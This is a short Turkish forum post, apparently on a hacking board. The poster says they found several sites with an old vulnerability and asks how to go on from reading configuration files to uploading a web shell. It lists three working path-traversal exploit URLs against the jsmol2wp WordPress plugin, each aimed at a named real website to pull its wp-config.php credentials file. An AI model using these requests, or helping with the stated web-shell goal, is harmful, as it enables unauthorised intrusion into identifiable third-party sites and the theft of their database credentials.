Bazı insanlar Path Traversal açığını kullanarak sanki çok önemliymiş gibi config dosyalarını çekiyorlar. Config dosyasındaki bilgiler ile mysql veya giriş sayfasına giremedikten sonra göstermenin ne anlamı var ki? Bilmediğim bir şey mi yapıyorlar? Eski bir güvenlik açığını barındıran bir kaç site buldum ve web shell yüklemek istiyorum. Sizce ne yapmalıyım?
Kod:
https://jialuyu.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
https://murase-lab.org/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
